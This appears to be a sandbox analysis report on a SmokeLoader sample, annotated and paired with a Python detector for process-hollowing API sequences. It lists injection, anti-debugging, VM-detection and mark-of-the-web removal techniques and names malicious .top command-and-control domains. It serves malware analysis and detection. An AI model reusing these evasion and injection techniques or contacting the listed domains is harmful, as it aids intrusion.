Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_004023D9 NtEnumerateKey, 5_2_004023D9
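The D380.exe function at 4_2_01D20110 is the textbook process-hollowing chain: CreateProcessA (the "suspended mode" signature elsewhere in this report supplies the CREATE_SUSPENDED flag), GetThreadContext, NtUnmapViewOfSection on the child's image, VirtualAllocEx plus NtWriteVirtualMemory/WriteProcessMemory, then SetThreadContext and ResumeThread. The Python below is an added example, not part of the report or of Joe Sandbox: it parses the "Code function" evidence lines in the format used above and applies an ordered-subsequence rule to each function's API list. The input lines are copied from the report; the rule steps and their accepted aliases are this example's own assumption, and a production rule would make the unmap step optional, since several loaders skip it.

```python
"""Parse 'Code function' evidence lines and flag process-hollowing API sequences."""
import re

# Constructed input: four evidence lines copied verbatim from the report above.
TRACE_LINES = r"""
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401813 Sleep,NtTerminateProcess, 1_2_00401813
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 1_2_00402052
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 4_2_01D20110
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00402403 NtEnumerateKey,NtEnumerateKey, 5_2_00402403
""".strip().splitlines()

# "Source: <path> Code function: <id> <api>,<api>,...,<api>, <id>"
LINE_RE = re.compile(r"^Source: (?P<src>.+?) Code function: (?P<fid>\S+) (?P<apis>[\w,]+) (?P=fid)$")

# Hollowing rule: each step is a set of accepted API names, steps must appear in this order.
# The alias sets are an assumption of this example, not something the report lists.
HOLLOWING = [
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext"},
    {"ResumeThread", "NtResumeThread"},
]


def parse_trace(lines) -> list:
    """Turn evidence lines into {source, fid, apis} records; unparseable lines are skipped."""
    records = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        apis = [a for a in m["apis"].split(",") if a]  # drop the trailing empty element
        records.append({"source": m["src"], "fid": m["fid"], "apis": apis})
    return records


def matches_in_order(apis, rule):
    """Greedy ordered-subsequence match: returns the API names that satisfied each
    step, or None if some step never appears after its predecessor."""
    hits, step = [], 0
    for api in apis:
        if step < len(rule) and api in rule[step]:
            hits.append(api)
            step += 1
    return hits if step == len(rule) else None


def find_hollowing(records) -> list:
    """Records whose API list contains the full hollowing chain, with the matched calls."""
    flagged = []
    for rec in records:
        hits = matches_in_order(rec["apis"], HOLLOWING)
        if hits:
            flagged.append(dict(rec, matched=hits))
    return flagged


if __name__ == "__main__":
    for rec in find_hollowing(parse_trace(TRACE_LINES)):
        print(rec["source"], rec["fid"], "->", ",".join(rec["matched"]))
```

Because the match is on names only, it cannot see the CREATE_SUSPENDED flag or whether the target of NtUnmapViewOfSection is the child's own image base; pairing this rule with the separate "creates a process in suspended mode" evidence, as the report does, is what makes the verdict solid.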
PE file contains strange resources
Source: qhQ6armJ25.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qhQ6armJ25.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D380.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D380.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gahfeaj.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gahfeaj.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll (39 identical entries)
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
Source: qhQ6armJ25.exe Virustotal: Detection: 45%
Source: qhQ6armJ25.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Note: this key is read by the Software Restriction Policy (Safer) check during process creation and appears in almost every report; it is not suspicious on its own.
Source: unknown Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
Source: C:\Users\user\AppData\Roaming\gahfeaj Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Users\user\AppData\Local\Temp\D380.exe Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
Note: each binary spawns a second copy of itself and the work continues in explorer.exe, which is the process that drops and launches D380.exe; the original sample and the Roaming copy are only stagers.
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Note: {0f87369f-a4e5-4cfc-bd3e-73e6154572dd} is CLSID_TaskScheduler; together with the taskschd.dll load in explorer.exe this points at scheduled-task persistence for the Roaming copy, although no task creation event is listed in this report.
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D380.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/3@10/1
Source: qhQ6armJ25.exe Static PE information: More than 200 imports for KERNEL32.dll
Source: qhQ6armJ25.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: qhQ6armJ25.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: qhQ6armJ25.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: qhQ6armJ25.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: qhQ6armJ25.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: qhQ6armJ25.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: qhQ6armJ25.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_004025F7 pushad ; iretd 1_2_004025FA
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_004029A6 push eax; ret 1_2_004029AE
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_004025F7 pushad ; iretd 1_1_004025FA
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_004029A6 push eax; ret 1_1_004029AE
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01D23146 push eax; ret 4_2_01D2314E
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01D22D97 pushad ; iretd 4_2_01D22D9A
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01F24733 push ebp; ret 4_2_01F24734
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01F1FB3B pushad ; iretd 4_2_01F1FB4B
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01F24210 push edi; ret 4_2_01F24239
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_004025F7 pushad ; iretd 5_2_004025FA
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_004029A6 push eax; ret 5_2_004029AE
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 6_2_004025F7 pushad ; iretd 6_2_004025FA
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 6_2_004029A6 push eax; ret 6_2_004029AE
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 6_1_004025F7 pushad ; iretd 6_1_004025FA
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00420500
Source: initial sample Static PE information: section name: .text entropy: 7.04028491917
Source: initial sample Static PE information: section name: .text entropy: 7.02591971436
Source: initial sample Static PE information: section name: .text entropy: 7.04028491917

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gahfeaj
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D380.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gahfeaj

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\qhq6armj25.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier read attributes | delete
Note: both actions are performed by explorer.exe, i.e. by the injected SmokeLoader code rather than by the sample's own process. Opening the Zone.Identifier alternate data stream of the Roaming copy with delete access strips the mark-of-the-web from the persisted file, so the copy launched at the next logon carries no record of having come from the Internet.

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: qhQ6armJ25.exe, 00000001.00000002.765854041.0000000001F40000.00000004.00000001.sdmp Binary or memory string: ASWHOOK
Note: ASWHOOK is the name of the Avast/AVG user-mode hooking module (aswhook.dll); looking for it in the loaded-module list is a check for an AV emulator or hooked environment, not for a hypervisor.
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 times)
Source: C:\Users\user\AppData\Roaming\gahfeaj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 times)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 2936 Thread sleep count: 615 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1316 Thread sleep count: 385 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1316 Thread sleep time: -38500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3080 Thread sleep count: 462 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3080 Thread sleep time: -46200s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6360 Thread sleep count: 439 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 660 Thread sleep count: 281 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6364 Thread sleep count: 282 > 30 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 615 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 385 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 462 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 439 Jump to behavior
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\qhQ6armJ25.exe System information queried: ModuleInformation Jump to behavior
Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAY
Source: explorer.exe, 00000002.00000000.749875732.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000002.00000000.732593679.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\qhQ6armJ25.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\gahfeaj System information queried: CodeIntegrityInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004202D0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00420500
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01D20042 push dword ptr fs:[00000030h] 4_2_01D20042
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01F1D6AA push dword ptr fs:[00000030h] 4_2_01F1D6AA
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\gahfeaj Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 6_1_00402679 LdrLoadDll, 6_1_00402679
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004202D0
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 0_2_0041E390 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041E390
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_0041FDD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0041FDD0
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_0041DE90 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0041DE90

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: gahfeaj.2.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: nalirou70.top
Source: C:\Windows\explorer.exe Domain query: privacytoolzfor-you7000.top
Source: C:\Windows\explorer.exe Domain query: xacokuo80.top
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\gahfeaj Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\gahfeaj Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\D380.exe Memory written: C:\Users\user\AppData\Local\Temp\D380.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 4_2_01D20110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Thread created: C:\Windows\explorer.exe EIP: 4F01920
Source: C:\Users\user\AppData\Roaming\gahfeaj Thread created: unknown EIP: 3151920
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
Source: C:\Users\user\AppData\Roaming\gahfeaj Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Users\user\AppData\Local\Temp\D380.exe Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
Source: explorer.exe, 00000002.00000000.712673606.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.731425992.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.745782073.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.749862534.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.738660675.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.759191918.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 0_2_00418430 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00418430

Stealing of Sensitive Information:

Yara detected SmokeLoader
Source: Yara match File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected SmokeLoader
Source: Yara match File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY